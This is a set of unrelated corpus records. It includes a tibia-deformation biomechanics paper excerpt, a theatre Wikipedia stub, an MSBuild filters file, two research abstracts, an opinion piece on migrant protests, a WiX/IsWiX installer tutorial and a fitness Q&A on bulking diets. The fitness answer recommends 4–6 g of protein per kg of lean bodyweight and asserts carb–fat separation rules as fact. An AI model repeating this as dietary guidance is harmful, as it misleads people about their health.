running at 5.5 km/h and walking at different speeds ([Figure 6C](#pone-0094525-g006){ref-type="fig"}, *p*\<0.001). Tibia torsion of two test subjects responded differently to the running speed. The tibia torsion angle significantly increased for test subject D (*p*\<0.001), but decreased in test subject E ([Figure 6B](#pone-0094525-g006){ref-type="fig"}, *p* = 0.0013). The variation across the walking and running cycles was assessed by the standard deviation of the deformation angles, which was summarized in [Table 5](#pone-0094525-t005){ref-type="table"}.
10.1371/journal.pone.0094525.t005
###### The variation across the walking and running cycles was assessed with the standard deviation (SD) of the deformation angles.
{#pone-0094525-t005-5}
SD (Deformation Angles, Degree)
--- --------- -------- --------------------------------- ------------ ------------
A walking 5--19 0.03--0.07 0.08--0.10 0.06--0.12
running 22 0.31 0.25 0.12
B walking 22--15 0.10--0.20 0.08--0.13 0.06--0.13
running 41 0.11 0.16 0.13
C walking 23--48 0.06--0.08 0.13--0.19 0.06--0.08
running 30 0.09 0.11 0.08
D walking 6--39 0.09--0.22 0.05--0.20 0.08--0.14
running 39--53 0.11--0.22 0.14 0.11--0.13
E walking 16--39 0.09--0.25 0.12--0.17 0.05--0.25
running 18--28 0.12--0.27 0.18--0.20 0.13--0.18
SD: standard deviation.
During treadmill walking, nonparametric analysis suggested a similar relationship between tibia deformation angles and moving speed as established during parametric analysis. More specifically, the AP bending angle increased with the walking speed (*p* = 0.007, except *p* = 0.42 for 2.5 km/h *v.s.* 3.5 km/h and *p* = 0.22 for 4.5 km/h *v.s.* 5.5 km/h comparisons). A larger AP bending angle was induced by running than walking (walking at 5.5 km/h *v.s.* run at 9 km/h: *p* = 0.03). No significant effects of speed were found on tibia torsion during treadmill walking (*p* = 0.22) and running (*p* = 0.08). ML bending remained at a low level and nearly constant across speeds (*p* = 0.45) and types of locomotion (*p* = 0.64).
Discussion {#s4}
==========
In this paper, the *in vivo* tibia segment deformation regimes in humans, *e.g.* bending and torsion, during walking and running were investigated utilizing a novel optical segment tracking (OST) approach for the first time. Substantial effects of the walking and running speed, VGRF and VFM on the bending and torsion deformation angles of the human tibia were found. It should also be stated that these deformations were of surprisingly large magnitude during walking and running. In addition to the expected result that tibia segment deformation would generally increase with locomotor speed and with ground reaction forces, this study has yielded a number of novel and less obvious findings. Firstly, and most importantly, bone segment deformation, almost like a finger-print, contains highly specific personal information. In other words, very close relationships were found between *e.g.* ground reaction force and tibia segment deformation within each test subject, but the exact nature of these relationships varied between people. Secondly, anterior-posterior bending and torsion were the prevailing tibia loading regimes, whilst medio-lateral bending was much less pronounced. Thirdly, the different tibia deformation regimes did not scale uniformly with locomotor speed or ground reaction force. Each locomotor activity was rather characterized by a variable amount of bending and torsional deformation. Fourth, on the basis of many studies on the bone deformation amplitude in the past, this study provides rationale to revisit the potential importance of *in vivo* loading regimes and its features during common exercises, *e.g.* walking and running.
1.1 Analysis of recording errors {#s4a}
--------------------------------
As with any new method, an assessment of limits arising from recording errors is vitally important. We see four major sources of error.
Firstly, the accuracy and the repeatability of the adopted optical system for recording minute marker movement in the targeted 3D volume have to be considered. As outlined above, the accuracy (absolute error) and the repeatability were very favorable within the volume of 400×300×300 mm^3^, namely maximum 1.8 µm and 2.5 µm, respectively, to assess displacements by 20 µm. The corresponding error can be translated in terms of angular deviation (α~error~ in [Figure 7A](#pone-0094525-g007){ref-type="fig"}) with the equations given as follows. The maximum between-marker distance within a marker cluster amounts to 25 mm, and we have to consider accuracy errors at both ends of the marker cluster. Thus, the total alignment error amounts to 2^1/2^ \* 1.8 = 2.55 µm, and the error for estimates of α~error~ would be 180°--2 \* arccos(2.55 µm/25 mm) = 0.012° (the calculations of arccos were based on angles, [Figure 7A](#pone-0094525-g007){ref-type="fig"}). The α~error~ value was smaller than reported deformation results by two orders of magnitude.
{#pone-0094525-g007}
Secondly, there is an undeterminable source of error associated with longitudinal variation as per the biological experiment itself. Our experience from the afore-mentioned *ex vivo* study suggested a reproducibility of approximately 0.04°. The value of 0.04° includes both measurement and experimental-longitudinal variation and is approximately twice as large as the measurement error only, but still substantially smaller than the reported results.
Thirdly, we have to consider that the bone screws could have loosened, *e.g.* due to the impact during the locomotor activities. However, the screws were deemed as stable upon removal after exercises were completed. Both orthopedic surgeons involved in the present study had performed hundreds of materials removals in their surgical practice. Moreover, the constant resonance frequency of the screw-cluster structure and the non-systematic and negligible drift between the marker clusters suggested firm fixation of the bone screws in the tibial cortex (unpublished data).
Fourthly, it is possible, in theory, that the marker cluster resonated during locomotor activities and thus produced artificial displacement. However, the vibration amplitude of the screw-cluster structure during the locomotor activities can be assessed with the known characteristics of the marker clusters and following equations, as illustrated in [Figure 7B](#pone-0094525-g007){ref-type="fig"}. The weight of the marker cluster is 5.6 grams. The most intense exercise, *i.e.* hopping, yielded acceleration of 3.5 times gravity, thus causing a force *F* of 0.19 N. The distance between the bone surface and the plane determined by three markers in the cluster is 26.6 mm (*L*), and the bending stiffness (flexural stiffness, *i.e.* the product of elastic modulus and area moment of inertia) of the bone screw shaft is 0.41 Nm^2^ (elastic modulus of the screw material: *E* = 110 GPa, inner and outer diameters of 1.5 and 3 mm, respectively, and thus area moment of inertia *I* = 3.73 mm^4^). Thus potential vibration amplitude of the markers induced by the acceleration of the marker cluster would be maximally [@pone.0094525-Gere1]
These results suggested that the amplitude of any vibration of the screw/cluster structure is relatively small, being certainly smaller than the resolution of the optical system, and probably negligible in comparison to the reported results.
1.2 Main findings on tibia segment deformation during walking on the walkway {#s4b}
----------------------------------------------------------------------------
Results from this study showed that the proximal tibia mainly twisted externally and bent to the posterior aspect, as well as to some extent to the medial aspect in relation to the distal tibia during the stance phase of walking and running. Previously, the tibia contact force and moment have been investigated with an instrumented knee implant [@pone.0094525-Heinlein1], [@pone.0094525-Kutzner1]. These results are in accordance with our findings, especially regarding the occurrence of posterior and medial bending as well as torsion moments during the stance phase of level walking. In line with this, bending and torsion moments have been predicted to occur during walking in a musculoskeletal model calculation [@pone.0094525-Wehner1]. However, the results in our study disagree with previous reports of tibia bending assessed during running by inverse dynamics analysis, in which anterior, rather than posterior tibia bending moments were postulated during the stance phase of running [@pone.0094525-HarisPhuah1]. The inconsistencies may relate to the inherent limitations of the inverse dynamics analysis approach, *e.g.* only joint reaction forces are calculated, which may derive unrealistic tibia load. In this context, the present results may provide further, indirect evidence to the view that the largest skeletal forces depend on muscle contractions, rather than simply arising from mass acceleration [@pone.0094525-Rittweger1].
Another important finding is the non-uniform scaling of deformation regimes. As exemplified in [Figure 3](#pone-0094525-g003){ref-type="fig"}, there were generally two noticeable deformation peaks, one in antero-posterior bending that coincided with the heel-strike, and another one in torsion that coincided with toe lift-off. This pattern was also confirmed by statistical analyses, suggesting that the peak-to-peak antero-posterior bending angles are linearly correlated with the first peak of the vertical ground reaction force, while the peak-to-peak torsion angle is unrelated to the second peak of the VGRF, but correlates with the second peak of VFM during the second half of the stance phase. Considering the fact that the mechanical load on the tibia shaft is generally caused by body weight and muscle contractions, the plantar flexors are primarily active during the second half of the stance phase. It is therefore tempting to assume that the body weight primarily induces the posterior bending of the tibia, while torsion is mainly produced by the plantar flexors contraction. Certainly, further study into the relationship between the deformation angles and body weight or muscle activities is needed to draw a firm conclusion.
1.3 Effects of walking speed on tibia segment deformation {#s4c}
---------------------------------------------------------
During walking on the walkway, tibia antero-posterior bending increased linearly with walking speed. This result is congruent with previous results of numerous animal experiments, *e.g.* dog tibia, dog radius, horse tibia, horse radius and goat tibia [@pone.0094525-Rubin3], [@pone.0094525-Biewener4]. Similarly, for three test subjects, the torsion angles, but not the medio-lateral bending angles, slightly and linearly increased with walking speed. The medio-lateral bending angles remained rather constant with speed. Likewise, during treadmill walking, antero-posterior bending increased with speed. Interestingly, for three test subjects, tibia torsion angles increased linearly with walking speed during overground walking, but remained constant during treadmill walking, indicating that the tibia load might be different for these two cases. It has been shown that larger compression and tension strains on one site of bone were generated during the overground running than during the treadmill running [@pone.0094525-Milgrom2]. The current results provide further evidence that the VGRF during the mid- and late-stance phase of treadmill walking differs from overground walking [@pone.0094525-White1], which might be able to explain the deformation difference found in the present study.
1.4 Relationship between tibia segment deformation and ground reaction force or moment {#s4d}
--------------------------------------------------------------------------------------
The results from this study revealed a strong relationship between the VFM and the tibia torsion deformation for four of the test subjects. It is of interest in this context that VFM seems to be closely related to the loading history of the tibia [@pone.0094525-Milner1]. Conversely, the results showed that tibia deformation or load could not be totally predicted from VGRF.
1.5 Tibia segment deformation during running on the treadmill {#s4e}
-------------------------------------------------------------
In general, running is a more demanding exercise than walking. The muscles in the lower extremities are generally more active during running than during walking. In addition, axial forces caused by mass acceleration are higher in running than in walking. Results from this study suggest that the antero-posterior bending angle during running is significantly larger than during walking, even at the same speed of locomotion ([Figure 6](#pone-0094525-g006){ref-type="fig"}). Despite the limited number of subjects (n = 2) participating in the jogging trials at 9 km/h, antero-posterior and medio-lateral bending were still significantly larger than at 5.5 km/h. Conversely, tibia torsion was profoundly decreased during jogging at 9 km/h, even below levels observed during walking. Previous strain gauge measurements generally found principal tibia strains to be larger during running than walking. However, no measurements in bending and torsion were available in these previous studies [@pone.0094525-Milgrom3], [@pone.0094525-Burr1].
Taken all of the above together, results of the present study indicated that not only the amplitude, but the regimes of tibia load differ between running and walking. It has been well accepted that stress fractures in the anterior tibia shaft can occur among long distance runners [@pone.0094525-Brubaker1]. Our experiment suggests that such stress fractures may be related to the high tension in the anterior aspect of tibia, whilst the posterior tibia was under even larger compression. Likewise, an inverse dynamics analysis study on runners indicated that the superposition of the joint reaction force and muscle force magnify the tibia posterior compression and attenuated the tibia shear force [@pone.0094525-Sasimontonkul1]. This might be one of the reasons why torsion angles from our measurements were lower during running than walking.
1.6 Limitations {#s4f}
---------------
Although new knowledge on human tibia segment deformation was contributed to understand the *in vivo* loading situations, the OST approach leaves some open questions. Firstly, unlike the strain gauge approaches, the local strain information of the tibia surface is not assessed in the proposed approach. Such a high-fidelity estimation or calculation should rely on an inversely-driven Finite Element Model (FEM), with anatomical tibia data -- an approach that is by no means trivial but necessary to understand the strain distribution across the tibia. Secondly, the capture volume of the optical system was limited (400×300×300 mm^3^ in this case) in order to maintain acceptable accuracy and repeatability during the deformation recording, meaning that tibia-affixed markers have to be in this volume during the recording trials of the exercises. As a consequence, the selection of exercises which can be performed, *e.g.* continuous recording of long term walking (Even for single gait cycle, the full swing phase is not always available due to the restriction of the capture volume) or running over ground, is limited. Thirdly, in the presented study, the comparatively small sample size (n = 5) raises the issue of interpretation of the parametric statistical analysis. Hence, nonparameteric statistics, which are conceived to be more robust for small sample size, were used in addition to parametric statistics to analyse the present results. No clear differences were found when comparing the two types of analyses, indicating that the small sample size in the present study is not likely to influence the conclusions we drew form the results. However, a larger sample size would still be appreciated in future studies. To summarize, it remains uncertain in how far the OST approach will be applied widely in future studies, due to its invasiveness. Understanding what can and what cannot be expected from the OST approach will guide the design of future studies, which firstly need to focus on improvement of the OST approach, and then further expand its application when justifiable.
Conclusions {#s5}
===========
In summary, taking together the tibia segment deformation results from this first application of the proposed OST approach in humans *in vivo*, we conclude that the human tibia experiences a considerable amount of bending and torsion loading during walking and running. The maximum peak-to-peak antero-posterior bending, torsion and medio-lateral bending angles reached up to 1.30°, 1.66° and 0.90° during walking, respectively. The tibia antero-posterior bending angles and torsion angles increased linearly with the walking speed and VGRF or VFM. More interestingly, a more or less fixed phase-relationship exists between different types of deformation during the stance phase of walking. Running generates larger antero-posterior bending angles, but smaller torsion angles than walking. These new findings on tibia segment deformation regimes during walking and running are therefore bound to change our understanding of long bone deformation in humans and provide more insights into the mechanical load distribution rather than mechanical load amplitude alone.
We would like to thank Peter Gauger, Wolfram Sies, Andreas Kriechbaumer and Jakob Kümmel for their kind help during data collection. We also would like to thank Hans-Martin Küsel-Feldker and Jürgen Geiermannat of the Institute of Biomechanics and Orthopaedics, German Sport University Cologne, Germany, for fine manufacturing the marker clusters. Special acknowledgements go to Alex Ireland for his kind language editing assistance. Peng-Fei Yang acknowledges Helmholtz Space Life Sciences Research School (SpaceLife) and his scholarship by the China Scholarship Council (CSC No.: 2009629013). Last but not least we are very grateful to our test subjects - without their selfless contribution, this work would not have been possible.
[^1]: **Competing Interests:**The authors have declared that no competing interests exist.
[^2]: Conceived and designed the experiments: PFY MS BG TK GPB LPM JR. Performed the experiments: PFY MS BG TK GPB LPM JR. Analyzed the data: PFY MS BG TK GPB LPM JR. Contributed reagents/materials/analysis tools: PFY MS BG TK GPB LPM JR. Wrote the paper: PFY MS BG TK GPB LPM JR.
|
{
"pile_set_name": "PubMed Central"
}
|
Palmetto Theatre
Palmetto Theatre is a historic movie theater located at Hampton, Hampton County, South Carolina. It was built in 1946, and is an Art Deco-influenced Art Moderne style building. It features a prominent, ornate, projecting marquee with highly stylized neon lettering and geometric patterns. The theater was designed to seat 450 people, including balcony seats.
It was listed on the National Register of Historic Places in 2012.
References
External links
Cinema Treasures
South Carolina Movie Theatres
Category:Theatres on the National Register of Historic Places in South Carolina
Category:Art Deco architecture in South Carolina
Category:National Register of Historic Places in Hampton County, South Carolina
Category:Buildings and structures in Hampton County, South Carolina
Category:Theatres completed in 1946
|
{
"pile_set_name": "Wikipedia (en)"
}
|
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Assets">
<UniqueIdentifier>4416d50a-7676-4d0a-9b2c-91ff70c6047f</UniqueIdentifier>
<Extensions>bmp;fbx;gif;jpg;jpeg;tga;tiff;tif;png</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<Page Include="$(SharedContentDir)\xaml\MainPage.xaml" />
<Page Include="$(SharedContentDir)\xaml\Styles.xaml" />
<Page Include="Scenario1_Data.xaml" />
<Page Include="Scenario2_Stats.xaml" />
<Page Include="Scenario3_Enum.xaml" />
<Page Include="Scenario4_UnicodeExtensions.xaml" />
<Page Include="Scenario5_TimeZone.xaml" />
</ItemGroup>
<ItemGroup>
<Midl Include="Project.idl" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="pch.cpp" />
<ClCompile Include="Scenario1_ShortName.cpp" />
<ClCompile Include="Scenario2_ShortName.cpp" />
<ClCompile Include="$(GeneratedFilesDir)module.g.cpp" />
<ClCompile Include="SampleConfiguration.cpp" />
<ClCompile Include="Scenario1_Data.cpp" />
<ClCompile Include="Scenario2_Stats.cpp" />
<ClCompile Include="Scenario3_Enum.cpp" />
<ClCompile Include="Scenario4_UnicodeExtensions.cpp" />
<ClCompile Include="Scenario5_TimeZone.cpp" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="pch.h" />
<ClInclude Include="Scenario1_ShortName.h" />
<ClInclude Include="Scenario2_ShortName.h" />
<ClInclude Include="SampleConfiguration.h" />
<ClInclude Include="Scenario1_Data.h" />
<ClInclude Include="Scenario2_Stats.h" />
<ClInclude Include="Scenario3_Enum.h" />
<ClInclude Include="Scenario4_UnicodeExtensions.h" />
<ClInclude Include="Scenario5_TimeZone.h" />
</ItemGroup>
<ItemGroup>
<AppxManifest Include="Package.appxmanifest" />
</ItemGroup>
<ItemGroup>
<Image Include="$(SharedContentDir)\media\microsoft-sdk.png">
<Filter>Assets</Filter>
</Image>
<Image Include="$(SharedContentDir)\media\smalltile-sdk.png">
<Filter>Assets</Filter>
</Image>
<Image Include="$(SharedContentDir)\media\splash-sdk.png">
<Filter>Assets</Filter>
</Image>
<Image Include="$(SharedContentDir)\media\squaretile-sdk.png">
<Filter>Assets</Filter>
</Image>
<Image Include="$(SharedContentDir)\media\storelogo-sdk.png">
<Filter>Assets</Filter>
</Image>
<Image Include="$(SharedContentDir)\media\tile-sdk.png">
<Filter>Assets</Filter>
</Image>
<Image Include="$(SharedContentDir)\media\windows-sdk.png">
<Filter>Assets</Filter>
</Image>
</ItemGroup>
<ItemGroup>
<None Include="packages.config" />
</ItemGroup>
<ItemGroup>
<ApplicationDefinition Include="$(SharedContentDir)\xaml\App.xaml" />
</ItemGroup>
</Project>
|
{
"pile_set_name": "Github"
}
|
Comparison of two series of non-invasive instruments used for the skin physiological properties measurements: the DermaLab® from Cortex Technology vs. the series of detectors from Courage & Khazaka.
The detectors from Courage & Khazaka and DermaLab® from Cortex Technology were two series of the most commonly used non-invasive instruments for the skin physiological properties measurements. The aim of this study is to reveal the differences and correlations in measuring skin color, hydration, transepidermal water loss (TEWL), sebum and elasticity on the forearm or faces between two commercially available series of instruments. 30 subjects were enrolled to be measured by the two series of instruments. The measurements by each series were performed on the left/right side of the body randomly. The hydration, sebum, elasticity and TEWL measurements were performed on different sites. Positive correlations were found in the values of skin color, hydration, TEWL, sebum and visco-elasticity detected by the two series. The values related to skin firmness measured by the two instruments were statistically negative correlated. Contrary to the results in measuring the skin color, the detectors from Courage & Khazaka presented lower values of variation in measuring skin hydration and TEWL than those from DermaLab® . The two series have significant correlations.The differences of the two series can be due either to differences in the design of the probe or left/right part of the body.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
As we’ve all learned by now, the courts and detention facilities at the southern border are packed to the brim and the White House has been working on ways to reduce the overcrowding by shipping some detained illegal aliens to other locations. That happened recently when CBP shipped roughly 100 “migrants” to the Customs and Border Protection station at Murrieta, California. (More correctly, the Theodore Newton and George Azrak Border Patrol Station.) Since this facility is located just south of Los Angeles and we’re talking about a welcoming sanctuary state, they were greeted with open arms by caring locals.
Naw, I’m just kidding. People started showing up to protest or just “monitor” the situation to make sure they weren’t unleashed into the community. (CBS Los Angeles)
An unknown number of migrants were recently flown into Murrieta’s Border Patrol facility and some in the community were quick to stand in front of the gates to let them know they’re not welcome to stay. Murrieta resident Bob Kowell says he’s all for legal immigration but told CBSLA’s Nicole Comstock that a source informed him of 100 undocumented immigrants being flown in from the Texas border to San Diego, then bussed to Murrieta over the weekend to be processed. “We can be called a racist and we’ll just smile. Because we don’t care,” said Kowell. “We’re watching to see where and when they’ll move.”
One of the locals interviewed by CBS said he had heard from an unnamed law enforcement source that the migrants were going to be processed and released at nearby bus and train stations. That has them “concerned” and they will be watching to make sure it doesn’t happen. The one quote from the guy is rather amusing. He’s quick to point out that he’s in favor of immigration and isn’t a racist, but he just doesn’t want those people being set loose in his community.
Wait a minute, here… isn’t that just what liberals protesting Trump accuse conservatives of saying? So what he’s basically telling us is he’s a big supporter, but not in his backyard. Got it.
For their part, the local police are saying that’s just not the case. They say the migrants will be held at the facility until their court dates. But Mr. Kowell and his friends will be watching.
It turns out that the station in Murrieta has a bit of history when it comes to protesting illegal immigrants in their midst. Back in 2014, there were buses carrying a couple of hundred migrants to the station and they were met in the streets by more than 1,000 protesters. There were chants of “Go back home!” and “USA” ringing in the streets and they eventually forced the buses to turn around and go back. And keep in mind that this was during the Obama administration and their much “kinder and gentler” immigration programs.
So it’s easy to show up at a march and blame President Trump for being cruel to the migrants. But everything seems to change when the problem moves from the border to your home town, I guess.
|
{
"pile_set_name": "OpenWebText2"
}
|
A semi-automated protocol for NGS metabarcoding and fungal analysis in forensic.
Metabarcoding through Next Generation Sequencing (NGS) has revolutionized environmental biological studies. The availability of this technical approach has opened the opportunity for a systematic implementation of fungal metabarcoding analysis in forensics, where standardized, sensitive and reproducible protocols are highly desirable. In the present paper, a pipeline including a semi-automated molecular protocol and user-friendly bioinformatics tools are applied to several kinds of environmental samples and forensic caseworks. The identification of fungi that characterize specific environments (like Aspergillus for indoor walls, or Penicillium, Debaryomices and Wickerhamomyces for food storage) can be informative for the provenance of samples. In some situations, fungal analysis cannot allow the identification of a defined environment but seems useful to cluster samples with similar provenance. Based on these considerations, fungal analysis can be included in a wider process of non-human DNA identification in order to provide clues on sample provenance.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
Installation Collaboration Workflows using Free Tools
Recently I was asked to explain the workflow for Industrial Strenth Windows Installer XML (IsWiX). In a nutshell IsWiX is all about enabling collaboration by enlisting the help of various contributors in defining the contents of the installer. This is done through the use of Microsoft Merge Modules. We use MSM’s rather then fragments and libraries because the intent is to interop with other tools such as InstallShield 2011.
At my day job, Visual Studio is included in the standard developer image which pretty much everyone in Engineering gets. Recently I was doing some work for a client when it became clear that the person who could best contribute to the project wasn’t a developer and didn’t have Visual Studio. While VS is not strictly required by IsWiX it really does help. So I started looking for a solution to the problem of a non-developer persona contributing to Setup and I came across the following:
This installer basically gives you a stripped down Visual Studio IDE with most tools and languages missing. It just happens that Windows Installer XML 3.5 supports this shell. ( As an aside, WiX 3.0 supports the 2008 version of the shell. ) Finally, IsWiX (Requires .NET 3.5 SP1) also supports this shell. So after downloading these three/four packages on an XP SP3 image we suddenly have a fully functioning IDE for authoring merge modules.
Now let’s go through the workflow.
1) Start Visual Studio 20102) Select File | New Project
3) Select Merge Module Project and pick a location and project name followed by OK.
4) After the project is created and shown in solution explorer, rename the MergeModule.wxs to the “[project].wxs”. (It’ll work if you don’t know this but it really gets annoying having dozens of wxs files with the same name.
5) Remove the TODO Create Component comments and save the WXS file.
At this point we are really just doing standard WiX stuff. Now let’s go play with IsWiX.
The first screen to come up in IsWiX is the General Information designer. This is where we can view and edit information related to the ModuleSignature and ModuleDependency tables. ( Wix, Package and Dependency elements in WiX speak. )
7) Click on the Files and Folders Designer
The files and folders designer is where you can define the say which source files get installed where. In WiX this will be your Directory, Component and File Elements. If you look closely you’ll see it’s only letting you pick files from where the wixproj and wxs files are. This is because by default the designer orientates itself to the current directory. Let’s change it to C:
8) Click on the Code View Tab
Notice that IsWiX has authored a special preprocessor variable called SourceDir and assigned it a value of ‘.’. Let’s change that line to read …. SourceDir=”……” ( the number of ..’s will depend on where you put your wxs file or you can just point it to some other directory if you’d like. ) Now let’s go watch the effect:
9) Click on the Designer View tab
Note the source files view now points to C:. Let’s author some files and folders into our merge module.
10) Drag a folder from the Source Files directory tree to the MergeRedirectFolder node on the destination folders tree.
Now we can see the directories / subdirectories and files shown in the destination. Let’s send these changes back to visual studio.
11) Click the save button and close IsWiX.
At this point Visual Studio will notice that the contents of our wxs file has changed and ask if you want to reload it.
12) Click Yes
From here we can see the XML that IsWiX authored for us. We can now rebuild the project to verify that the module builds.
13) Right click the merge module project in the solution view and select Rebuild.
By now it should be obvious that IsWiX can allow non-developers to author merge modules. But WiX developers can also edit the raw XML by hand and add in additional elements such as ServiceInstall, ServiceControl, ShortCut, ProgId and so on. Most edits by hand will have no effect on IsWiX. Eventually it’s hoped to write additional designers that can automate all of these elements.
The other point I’d like to make is the workflow that I use this with
1) Meet with subject area experts ( Dev, Web, Docs, DBAs et al ) and have a dialog where we provide them a basic understanding of Installers and they provide us a basic understanding of the design of their solutions.
2) Come to an agreement on how their solution breaks down into Feature and Merge Modules. Implement the feature tree in the installation tool of your choice ( InstallShield 2011 for me ) and do the initial setup of the merge module solution.
3) Inform the developers that it’s now their job to keep the modules up to date and that we are available to assist / answer question and do additional meta markup such as services and COM.
So there it is in a nutshell. How I do collaboration using IsWiX / WiX and InstallShield. If your needs are limited you could use WiX or InstallShield 2010 Limited Edition and have a complete system with nothing but free tools.
Any questions?
PS- Just for fun I decided to try to install InstallShield 2010LE on the Visual Studio 2010 Shell. It kind of worked. It did install and I could open an existing ISL project but the ability to create a new LE project from the File menu was missing. This isn’t important to the Collaboration discussion I mentioned above because I would expect the Setup developer supporting all of this would either have WiX, InstallShield Profesional or Visual Studio and InstallShield LE.
|
{
"pile_set_name": "Pile-CC"
}
|
Q:
Do i really have to eat this much for building muscles?
The calorie calculator tells me to eat 2700.
My friends/forums tell me to eat 3000-5000 to bulk up.
I'm student who us very lightly active. Most of the time I read or sitting at the desk.
I do go to the gym 5 times a week. And now I do take 2600 cal and 200gram protein daily. But I'm getting fatter and the belly is growing.
If I sink it down to 2100 cal, will this affect my muscle growth? What should I do? How much to eat? I need maximum muscle growth and minimum body fat.
23yo. Male. 1 year experience. I do run every night for 2-5km.
5 days per week for weight lifting. 174 cm. 82 kg.
A:
Calorie calculators can't tell you exactly how many calories you need to eat -- they're making a lot of assumptions about your metabolism, activity level, etc. While tools like the Harris Benedict Formula are useful, they are generalizations -- everyone is different. Not to mention, your activity level and metabolic rate will vary from week to week due to all kinds of stimulus you may not be able to control (stress levels, weather, relationships, sleep, and so on). You should use a calorie calculator as a baseline and do your own study from there.
The easiest way to do this is to buy a skin fold caliper (~$8 on amazon) and start a spreadsheet. Use the calipers to measure your bodyfat, and weigh yourself every day or week. Keep track of how many calories you're eating using something like fitday (or tallying the calories yourself). Keep this data logged and make adjustments on a weekly basis.
You can dial in your daily caloric needs by observing for a couple of weeks. If your weight and bodyfat don't fluctuate over the duration, you can average the number of calories you ate to determine your daily needs. At that point, you can increase your calorie consumption by about 300-500 per day for the duration of your bulk. If you find you are putting on too much body fat, you can tweak these numbers.
I realize that reading "couple of weeks" can be off-putting because we want a solution right now. But remember that there is no instant gratification in fitness. You can't get a six pack overnight, nor can you squat 405 overnight. Be scientific, be patient, and your results will reflect your effort.
A:
There are many reasons that bulking diets fail but here are a few of the most common reasons:
1. Calories are not high enough and putting on muscle mass fails.
2. Calories are too high and macros are wrong. This in turn leads to putting on fat as well as muscle.
3. You are bulking, not cheating. Cheat days can be factored in, but your food choices should still be healthy. All diets, whether cutting or bulking, need to be monitored. This means that watching your insulin spikes and the type of carb you consume.
4. You are what you eat, it’s that simple. To simplify, you eat crap and you will look like crap.
Harris Benedict Formula for Calorie Calculations
“The Harris Benedict equation is a calorie formula using the variables of height, weight, age, and gender to calculate basal metabolic rate (BMR). This is more accurate than calculating calorie needs based on total body weight alone. The only factor it omits is lean body mass and thus the ratio of muscle-to-fat a body has. Remember, leaner bodies need more calories than less leaner ones. Therefore, this equation will be very accurate in all but the very muscular (Harris-Benedict will under-estimate calorie needs) and the very fat (Harris-Benedict will over-estimate calorie needs).”
That being said, there are is no concrete number of daily calorie intake your body needs, however using this formula will give you can idea of what you do need.
Harris Benedict Formula for Men - Step 1
BMR = 66 + (13.7 X weight in kilos) + (5 X height in cm) - (6.8 X age in years)
Example:
You are 25 years old
You are 6 feet tall
Your weight is 220 pounds
Your BMR is 66 + (1370) + (914) - (170) = 2180 calories
Harris Benedict Formula for Men - Step 2
To determine your total daily calorie needs (aka TDEE) multiply your BMR by the appropriate activity factor, as follows:
If you are Sedentary - little or no exercise
Calorie-Calculation = BMR X 1.2
- If you are Lightly Active (light exercise/sports 1-3 days/week)
Calorie-Calculation = BMR X 1.375
- If you are Moderately Active (moderate exercise/sports 3-5 days/week)
Calorie-Calculation = BMR X 1.55
- If you are Very Active = BMR X 1.725 (hard exercise/sports 6-7 days/week)
Calorie-Calculation = BMR X 1.725
- If you are Extra Active (very hard daily exercise/sports & physical job or 2X day training)
Calorie-Calculation = BMR X 1.9
Total Calorie Needs Example
If you are lightly active, multiply your BMR (2180) by 1.375 = 2997
Your total daily calorie requirement is therefore 2997 calories.
This is the total number of calories you need in order to maintain your current weight.
If you want to gain body weight, you must consume more calories than you burn, pretty straightforward. So now we know that you need extra calories to gain weight. So what should these calories be comprised of?
The BASICS-
1. Carbs - carbohydrates are a very helpful macronutrient when you are trying to gain lean mass. Meals should be comprised of slow burning complex carbs that are low on the glycemic chart. Some good examples of low glycemic carbs are brown rice, yams, and oatmeal. Others may include whole wheat bread, whole wheat pasta.
Protein - For bulking a good rule of thumb is 4g-6g of protein per kilogram of lean bodyweight. You should take in a good portion of your protein in the source of real meals, avoid intaking too many shakes. Examples of food with high protein bioavailability is egg whites, lean steak, and chicken breast.
Fats - EFA’s (Essential Fatty Acids) are extremely important in any diet. Examples of good sources of fat are flax oil, nuts, salmon, olive oil.
The separation of Carbs and Fats - It is often when you eat items and with what you eat them that is more important than what you are eating. Remember that when you take in certain carbs you can spike your insulin levels. If you are taking in fats when your insulin is spiked you are allowing the basic laws of physiology to act out, and you allow for a higher propensity for fat storage. Separation is key. The sample diet will give a good example of how to separate them.
Supplements - Glutamine: Helps prevent catabolism. Best used in dosages of 10grams daily, 5 grams before cardio and 5 grams at another interval, but not after workout as it fights for absorption with the glutamine peptides in whey. Creatine: Unlike while cutting, creatine can be used while bulking since the water retention from its use will not be an issue since you are “bulking”. In the body, creatine is synthesized from the amino acids glycine, arginine and methionine. Taking supplemental doses of creatine monohydrate can increase muscle creatine and phosphocreatine (PC) concentrations by up to 40%. These increases can lead to improvements in muscle energy production and recuperation.
Cheating - Cheating is essential. Why? Remember, the body runs on homeostasis and it likes to keep balance. After eating so well after a week, your body begins to adjust and lean mass gain / fat burning over time will not be as rapid. The other extremely important aspect is mental sanity. So many diets crash and fail because people don’t give themselves a chance to breath. Shoot for a cheat meal, not an all out binge. A fast food value meal can be 2,000 calories. Eat that 3 times on one day, and you’ve consumed 6,000 calories. And that’s not good in any case.
Cardio - Cardio works the most important muscle of all – your heart. Not only that but doing cardio 3 times a week will help keep the fat you will gain in this diet to a minimum. The proper cardio for burning fat is done by staying in your target heart rate for fat burning which is 65-70% of your max heart rate for a period of 45-60 minutes.
Sample Diet:
Based on the Harris Benedict formula above, our friend here needs 2997 calories a day to maintain his current weight. So in order for him to gain 1 pound a week, we need to increase his calories to right around 3500 a day since that will yield 3500 calories over his maintenance numbers needed for the week.
Meal 1: Pro/Carb
8 Egg Whites, 1 Scoop Of Whey Protein, 1 cup oatmeal
50g protein / 54g carbs / 5g fat
Meal 2: Pro/Fat
Lean Ground Beef, ¼ cup swiss cheese, green veggies
55g protein / 2g carbs / 20g fat
Meal 3: Pro/Carb
Chicken Breast, 1 and a half cup Brown Rice
55g protein / 64g carbs / 3g Fat
Meal 4: Pro/Fat
2 Cans of Tuna, 1 Tbsp Full Fat Mayonnaise, Veggies
60g protein / 2g carbs / 13g Fat
Meal 5: PWO Nutrition
2 Scoops Whey Protein / 80g of Dextrose
40g protein / 80g carbs / 0g fat
Meal 6: PPWO
Boneless Skinless Chicken Breast, ½ cup Brown Rice (Measured Uncooked)
